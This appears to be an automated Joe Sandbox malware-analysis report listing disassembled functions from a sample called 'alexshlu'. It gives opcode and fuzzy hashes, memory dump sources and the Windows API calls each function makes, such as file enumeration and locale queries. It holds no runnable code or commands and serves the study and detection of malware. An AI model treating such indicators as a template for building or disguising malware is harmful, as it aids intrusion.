• Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
Similarity
• API ID: FeaturePresentProcessor
• String ID:
• API String ID: 2325560087-0
• Opcode ID: 11de5198085ae61322fc052cf3b8565c224c50f99d0544ed8c4c397ac92be17d
• Instruction ID: 18bd30d6e32ffd78d8cdcf22a2a007a861f2d18299d4f2d4de4e5182b819268f
• Opcode Fuzzy Hash: 11de5198085ae61322fc052cf3b8565c224c50f99d0544ed8c4c397ac92be17d
• Instruction Fuzzy Hash: E7A17BB2D126068FDB18CF58E8996A9FBB0FB49324F24816BD426E76A0D7349C41CF50
APIs
  • Part of subcall function 002BBC50: RtlAllocateHeap.NTDLL(00000008,?,?,?,002BAB70,00000001,00000364,?,00000005,000000FF,?,002B3FBA,002D4C30,0000000C), ref: 002BBC91
• FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 002C0A09
• FindNextFileW.KERNEL32(00000000,?), ref: 002C0AFD
• FindClose.KERNEL32(00000000), ref: 002C0B3C
• FindClose.KERNEL32(00000000), ref: 002C0B6F
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
Similarity
• API ID: Find$CloseFile$AllocateFirstHeapNext
• String ID:
• API String ID: 4087847297-0
• Opcode ID: 774c9f18bf24892e74dca2dfd17946d278bb8c49ed325607d8c43187cdcfa288
• Instruction ID: 0c5b96e3ab4d40d09a2a8e0e9d483c7fe37bd88d1c3cf34f5222ddb52e15944d
• Opcode Fuzzy Hash: 774c9f18bf24892e74dca2dfd17946d278bb8c49ed325607d8c43187cdcfa288
• Instruction Fuzzy Hash: 89513471920219EFEB14AF689CC5FBE77A9DF85314F1483ADF41893202EA309D618B60
APIs
  • Part of subcall function 002BAB23: GetLastError.KERNEL32(?,?,002B3FBA,002D4C30,0000000C), ref: 002BAB27
  • Part of subcall function 002BAB23: SetLastError.KERNEL32(00000000), ref: 002BABC9
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 002C01C4
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
Similarity
• API ID: ErrorLast$InfoLocale
• String ID:
• API String ID: 3736152602-0
• Opcode ID: 37f469b5fad92cb844aa76c6e0498af660a5a2923cb61646a6363f373f6ba899
• Instruction ID: ae6fca98778e535f503f2ce6684085e8e63498f4852a40592d7736e792da955b
• Opcode Fuzzy Hash: 37f469b5fad92cb844aa76c6e0498af660a5a2923cb61646a6363f373f6ba899
• Instruction Fuzzy Hash: E421C232A25207EBDB289F65EC86FBA73A8EF08310B10417EFD05D6141EB74ED608B51
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                        • API String ID: 0-4108050209
                                                                                                                                                                                                                                        • Opcode ID: ea248d067a1c1e8b92a976cf0fdd4432171732eb0d467746d95ba4ed565ad266
                                                                                                                                                                                                                                        • Instruction ID: 8020812f3562b1927a0602bcf72b2182d66c5791efb330b6fd94e584772ba401
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ea248d067a1c1e8b92a976cf0fdd4432171732eb0d467746d95ba4ed565ad266
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 83C1DCB09206079FCB34CE28C584AFABBA5EF09380F644619E55297791C731EF69CB51
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                        • API String ID: 0-4108050209
                                                                                                                                                                                                                                        • Opcode ID: 1435e98591f187588e8530518c29035e1cee23f1a38d1711ae1d84cc781aad72
                                                                                                                                                                                                                                        • Instruction ID: 9c8f3ecac85f142b0fcc63a2cd168e00019a393b5c977a23432ca016898e59ec
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1435e98591f187588e8530518c29035e1cee23f1a38d1711ae1d84cc781aad72
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7BB1D23093070BDBCB24CE6CC9556FEBBB0AF04380F144619DAA6D7692C634AD6ACB51
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 002BAB23: GetLastError.KERNEL32(?,?,002B3FBA,002D4C30,0000000C), ref: 002BAB27
                                                                                                                                                                                                                                          • Part of subcall function 002BAB23: SetLastError.KERNEL32(00000000), ref: 002BABC9
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 002C02E4
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3736152602-0
                                                                                                                                                                                                                                        • Opcode ID: bc51eafb81f395c2278a638bb9f497e5bd575704b18209e862578954ac6e35ca
                                                                                                                                                                                                                                        • Instruction ID: 9a29c96be74540dacdd0d31d54d86d8a85535697afb9ecfe0469285bc9473035
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bc51eafb81f395c2278a638bb9f497e5bd575704b18209e862578954ac6e35ca
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C811C632A2121B9BD718EF29DC86EBA77ACEF05354B10417EFA01D7241EB78ED108B50
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 002BAB23: GetLastError.KERNEL32(?,?,002B3FBA,002D4C30,0000000C), ref: 002BAB27
                                                                                                                                                                                                                                          • Part of subcall function 002BAB23: SetLastError.KERNEL32(00000000), ref: 002BABC9
                                                                                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(002BFEBE,00000001,00000000,?,-00000050,?,002BFCAE,00000000,-00000002,00000000,?,00000055,?), ref: 002BFE95
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2417226690-0
                                                                                                                                                                                                                                        • Opcode ID: 6cf298aee7b29ded597465955af447126ea1801f7bb1a267e71b817ea3cd48c4
                                                                                                                                                                                                                                        • Instruction ID: 33982b01d4ea97601a80bb7c567606615b9eda06ecb782399e35c4bdf079f938
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6cf298aee7b29ded597465955af447126ea1801f7bb1a267e71b817ea3cd48c4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 531129372103059FDB289F39D8916BAB791FF80398B14443DE54687741D371B952CB40
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 002BAB23: GetLastError.KERNEL32(?,?,002B3FBA,002D4C30,0000000C), ref: 002BAB27
                                                                                                                                                                                                                                          • Part of subcall function 002BAB23: SetLastError.KERNEL32(00000000), ref: 002BABC9
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,002C00DA,00000000,00000000,?), ref: 002C0469
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
Similarity
• API ID: ErrorLast$InfoLocale
• String ID:
• API String ID: 3736152602-0
• Opcode ID: c6eca337af0812ee6bb85f1a3250f56b97d6587faffad7536bb4a4e7d09ce613
• Instruction ID: 9b5bda1aaf143c5555c45a31fa171aab7ea1a3dd01f7f95c4d29cb908379c5a1
• Opcode Fuzzy Hash: c6eca337af0812ee6bb85f1a3250f56b97d6587faffad7536bb4a4e7d09ce613
• Instruction Fuzzy Hash: 71012B32A70112EBDB3C5B228C45FBB7768EF40364F14452DED42A3180DA70EE51D590
APIs
  • Part of subcall function 002BAB23: GetLastError.KERNEL32(?,?,002B3FBA,002D4C30,0000000C), ref: 002BAB27
  • Part of subcall function 002BAB23: SetLastError.KERNEL32(00000000), ref: 002BABC9
• EnumSystemLocalesW.KERNEL32(002C0170,00000001,?,?,-00000050,?,002BFC76,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 002C015B
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem
• String ID:
• API String ID: 2417226690-0
• Opcode ID: 8740ef0f61ba2c010757fb73eec22304f12eb2443cf8db44481b7d346337281c
• Instruction ID: 2d6cf99f58bc7af2eab3d82fdbd3bf06e2182ad061eeb581682126eae4b577c9
• Opcode Fuzzy Hash: 8740ef0f61ba2c010757fb73eec22304f12eb2443cf8db44481b7d346337281c
• Instruction Fuzzy Hash: 77F02232210305AFCB245F389CC1F6ABB91EF80768F08412DF9094B680C2F1AD428A40
APIs
  • Part of subcall function 002B6BF4: EnterCriticalSection.KERNEL32(?,?,002BAFB0,?,002D50C0,00000008,002BAEA2,?,?,?), ref: 002B6C03
• EnumSystemLocalesW.KERNEL32(002BBB53,00000001,002D5140,0000000C,002BB4B8,-00000050), ref: 002BBB98
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
Similarity
• API ID: CriticalEnterEnumLocalesSectionSystem
• String ID:
• API String ID: 1272433827-0
• Opcode ID: 165005f292ef2d41ecac0aec687b271dd2ac938c21f6dff1c919e46008a00f54
• Instruction ID: d6362cb7626ba100433c0dc28ad49c7e4eab6cf7360851f59a7b37fe6c63ccb8
• Opcode Fuzzy Hash: 165005f292ef2d41ecac0aec687b271dd2ac938c21f6dff1c919e46008a00f54
• Instruction Fuzzy Hash: 0AF04972A11205EFDB00EFA8E856B9D77F0EB09765F10802AF411DB3A1CBB999148F80
APIs
  • Part of subcall function 002BAB23: GetLastError.KERNEL32(?,?,002B3FBA,002D4C30,0000000C), ref: 002BAB27
  • Part of subcall function 002BAB23: SetLastError.KERNEL32(00000000), ref: 002BABC9
• EnumSystemLocalesW.KERNEL32(002C0290,00000001,?,?,?,002BFCD0,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 002C027C
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem
• String ID:
• API String ID: 2417226690-0
• Opcode ID: 7ce3c4ce0cde584039e006f46cd8c1c632bec9ba256b82de32ea61b6f08ac353
• Instruction ID: 0d3f6b70e5979b742a89e5333a0e3e9691a574b03c9cffecc11c11ed9190e83c
• Opcode Fuzzy Hash: 7ce3c4ce0cde584039e006f46cd8c1c632bec9ba256b82de32ea61b6f08ac353
• Instruction Fuzzy Hash: 75F0AB3B70030997CB049F35D889BAABFA0EFC1720F0A405DEE058B280C2719D42CB91
APIs
• GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,002B5950,?,20001004,00000000,00000002,?,?,002B4862), ref: 002BB5F0
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
• Opcode ID: 9a3996cfcf2404c2310358229fe0b3035de2e4eb8d6b6648a771751ac0c5857d
• Instruction ID: dd0a38f37eb310d55b363c2296f748bfbc3262461a91aaa0aba97a857b4e0f51
• Opcode Fuzzy Hash: 9a3996cfcf2404c2310358229fe0b3035de2e4eb8d6b6648a771751ac0c5857d
• Instruction Fuzzy Hash: 25E01A32911118BBCB236F61EC08ADE7B26EF44790F008011F905652218BB1CE31AB96
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_0000D984), ref: 002AD868
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: 227e3ead1adaaefb09fa5bc533892f5d0c6fe9a257b6635d111e5e2bdcb4e740
• Instruction ID: 7dbac6952c2c8391279c22f2164ca07cf1bc1c3033ae341bff2285336a8016d9
• Opcode Fuzzy Hash: 227e3ead1adaaefb09fa5bc533892f5d0c6fe9a257b6635d111e5e2bdcb4e740
• Instruction Fuzzy Hash:
APIs
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: HeapProcess
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 54951025-0
                                                                                                                                                                                                                                        • Opcode ID: 23eedf47bc54384891ed140793bef19f947c6a99dab73fd27d30f5ca32938cbb
                                                                                                                                                                                                                                        • Instruction ID: b2d0bdbdfde95689ea331e2f571bbfd80e6890b49061d288e82589081202b142
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 23eedf47bc54384891ed140793bef19f947c6a99dab73fd27d30f5ca32938cbb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8BA01130E02200AF83008F3ABA0C2083BA8AA8028030A802AE000C00A0EA388C80AF02
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: b2bdac32ef503a7950e44baef27db67de43216102fc7aa130cab533a1ccbc597
                                                                                                                                                                                                                                        • Instruction ID: 7e3f3a1d71e950eb4cecbf7784b6cf90d8bdd56dee302fbe4b9556e1eab94fc8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b2bdac32ef503a7950e44baef27db67de43216102fc7aa130cab533a1ccbc597
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 374290746287518FC714DF28C49066BB7E1BFCA304F64895DE88A8B3A1DBB4DC61CB42
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 002A1F53
                                                                                                                                                                                                                                        • RegisterClassW.USER32(?), ref: 002A1F6A
                                                                                                                                                                                                                                        • CreateWindowExW.USER32 ref: 002A1FCA
                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 002A1FD4
                                                                                                                                                                                                                                        • GetMessageW.USER32(Christmas Balls,00000000,00000000,00000000), ref: 002A2000
                                                                                                                                                                                                                                        • GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 002A203D
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Message$ClassCreateErrorHandleLastModuleRegisterWindow
                                                                                                                                                                                                                                        • String ID: Christmas Balls$CreatingTool$Keep low...$[err id]: %i
                                                                                                                                                                                                                                        • API String ID: 91802587-478130180
                                                                                                                                                                                                                                        • Opcode ID: 2161ea7bd8a100ecae51e84262b2f4f599689114687a8db4dec71b834ce2e74d
                                                                                                                                                                                                                                        • Instruction ID: 9f8c2dbd68fbaabf85c78cdbeef895a99bf713e36508cb3ee2b7f210eec266fb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2161ea7bd8a100ecae51e84262b2f4f599689114687a8db4dec71b834ce2e74d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 91419070A28341DFD300DF24D849B2BB7E4BF9A704F00851DF9899B290DB70D954CB92
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCPInfo.KERNEL32(00B15C50,00B15C50,00000000,7FFFFFFF,?,002C96FD,00B15C50,00B15C50,00000000,00B15C50,?,?,?,?,00B15C50,00000000), ref: 002C97B8
                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 002C9873
                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 002C9902
                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 002C994D
                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 002C9953
